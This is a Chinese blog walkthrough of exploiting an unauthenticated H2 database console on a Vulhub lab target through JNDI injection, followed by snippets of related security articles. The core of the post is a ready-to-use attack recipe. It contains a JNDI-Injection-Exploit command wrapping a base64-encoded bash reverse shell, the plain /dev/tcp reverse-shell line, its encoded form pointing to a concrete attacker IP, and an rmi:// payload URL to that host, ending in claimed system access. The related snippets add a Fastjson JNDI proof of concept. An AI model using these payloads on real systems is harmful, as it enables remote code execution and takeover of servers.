Vulhub靶机 h2-console-unacc jndi注入(渗透测试详解)

最新推荐文章于 2025-04-14 09:09:48 发布
最新推荐文章于 2025-04-14 09:09:48 发布
阅读量347 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: 网络安全 安全性测试 大数据 elasticsearch 搜索引擎
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_78721909/article/details/145621290

一、开启vulhub环境

docker-compose up -d  启动
docker ps 查看开放的端口

二、访问靶机IP 8080端口 

1、拼接h2-console,得到h2database web管理页面

2、利用以下工具,启动反弹命令并开启nc监听

工具地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,反弹shell语句(base64加密)}|{base64,-d}|{bash,-i}" -A 攻击机IP

/bin/sh -i >& /dev/tcp/x.x.x.x/6666 0>&1
L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTMzLjU3LzY2NjYgMD4mMQ==

三、指定驱动类及将生成的指令进行提交反弹shell

指定驱动器类:javax.naming.InitialContext
调用远程rmi方法:rmi://47.121.133.57:1099/en4taw

点击连接,成功反弹上shell

至此,系统权限成功获取

下期再见,家人们!

芜丶湖
关注
项目使用内嵌式H2数据库,IDEA配置完成,在浏览器输入:http://localhost:8080/h2-console却无法连接
m0_56058975的博客
12-03 1879
出现这种情况是因为URL的路径不对,在你启动项目的时候,日志里会输出这个路径地址,在输入框里填入此路径即可,以后你每次启动项目都会重新生成路径需要每次填写
H2 Database Console 未授权访问复现
玄道的网安博客
01-22 2391
漏洞概述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装...
Spring Boot 使用 H2 数据库的控制台(Console
热门推荐
HONEY MOOSE
04-05 1万+
如果你希望在 Spring Boot 启用 H2 数据库的话,这篇文章适合你进行了解。 概述 在这个指南中,我们将会考虑如何在 Spring Boot 中使用 H2 数据库。 与其他数据库相似,Spring Boot 生态系统中能够完全支持 H2 数据库 依赖(Dependencies) 让我们首先需要定义 H2 数据库依赖:https://search.maven.org/searc...
h2-console: Example Using the H2 Console with JBoss
jvisualvm
01-06 338
首先参考以下链接查看h2-console的相关说明和配置 http://www.jboss.org/jdf/quickstarts/jboss-as-quickstart/h2-console/   接着进入https://github.com/jboss-jdf/jboss-as-quickstart/tree/jdf-2.0.0.Final 或者通过git clone git://g...
H2database指南
pxcong007的专栏
07-19 395
前言 :H2database是一款用java语言编写的开源数据库。 H2服务器下载下载地址: [url]http://www.h2database.com/[/url]。 原文地址[url]http://www.h2database.com/html/tutorial.html[/url] 下文前提是数据库已被解压安装完毕。 本文地址[url]http://congpeixue.itey...
H2 Database Console未授权访问
zzzzz1284的博客
01-06 1250
H2 Database Console未授权访问
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1529
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3556
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
WebLogic:CVE-2023-21839[JNDI注入]
h1008685的博客
08-01 703
WebLogic:CVE-2023-21839[JNDI注入] 漏洞原理,环境部署,漏洞利用:生成指定payload,kali启动ldap服务器,windows向靶机发送poc,建立连接
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
SpringBoot集成H2 Console管理界面
最新发布
罗小爬的技术宝书
04-14 1000
这个 URL 配置了一个运行在内存中的 H2 数据库,兼容 MySQL,表名和列名自动转为小写,并且设置了数据库在连接关闭或 JVM 退出时不会自动关闭。
H2 Console Sorry, remote connections (‘webAllowOthers‘) are disabled on this server.
m0_57236802的博客
10-25 1368
请注意,允许远程连接可能会增加安全风险,因为其他网络上的用户可能会尝试连接到你的 H2 数据库。确保你的网络和数据库都有适当的安全措施,例如使用防火墙和强密码,以及只在信任的网络上允许远程连接。现在,当 H2 数据库启动时,它应该允许远程连接。你可以尝试再次通过 web 浏览器访问 H2 控制台,并应该能够成功连接。出现这个错误是因为 H2 数据库默认配置禁止了远程连接。要允许远程连接,你需要在启动 H2 数据库时添加。
JAVA H2 console 配置
weixin_34192993的博客
06-22 842
打开应用H2 console 页面 ,增加下面红色部分 <!-- h2控制台配置开始,生产环境中请屏蔽 --> <servlet> <servlet-name>H2Console</servlet-name> <servlet-...
使用Spring Security的时候,H2console页面显示出错
weixin_43981241的博客
08-26 1339
问题描述: 在spring-boot的项目里开启了spring-security (spring-cloud-oauth2),同时开启了h2console。 在打开浏览器访问h2 console的时候,页面显示不出来,同时,在浏览器的开发者工具中,会出现如下的问题: 具体报错信息为: Refused to display 'http://localhost:8080/console/header.jsp?jsessionid=2c4c46b7baf3f8f1dfe697fdf382b444' in ..
h2数据库console无法打开
MenBad的博客
12-07 1527
@Bean org.h2.tools.Server h2Server() { Server server = new Server(); try { server.runTool("-tcp"); server.runTool("-tcpAllowOthers"); } catch (Exception e) { e.printStackTrace(); } return server; }
H2 Database Console未授权访问漏洞封堵
本博客纯属个人网络笔记,如对阁下有用,甚喜;否则,关掉即可,不喜勿喷。专心写代码,不做键盘侠!
07-05 804
H2 Database Console未授权访问,默认情况下自动创建不存在的数据库,从而导致未授权访问。网络上能搜到各种未授权访问的教程,但是它怎么封堵呢?
H2使用
yun6713的博客
12-04 869
文章目录创建数据库 https://www.cnblogs.com/xdp-gacl/p/4171024.html 中文教程:https://blog.youkuaiyun.com/daqiang012/article/details/81069894 创建数据库 运行./bin/h2.bat,启动h2 打开localhost:8082;默认数据库为test,无密码。 修改JDBC URL(规则:jdbc:h...
JNDI注入JNDI注入Bypass
weixin_45032957的博客
06-09 408
看这个图,就感觉很清晰. 测试ldap攻击:jdk版本选择:jdk8u73 ,测试环境Mac OS jdk8系列各个版本下载大全:https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 恶意类:Exploit.java: 复制代码 import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFact
sqli-labs靶场:掌握SQL注入渗透测试技巧
sqli-labs是一个面向初学者和中级渗透测试人员的SQL注入练习平台,它提供了不同难度级别的练习场景,用户可以在这些场景中尝试使用各种SQL注入技巧。在开始使用sqli-labs之前,用户需要具备一定的Web应用结构知识、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值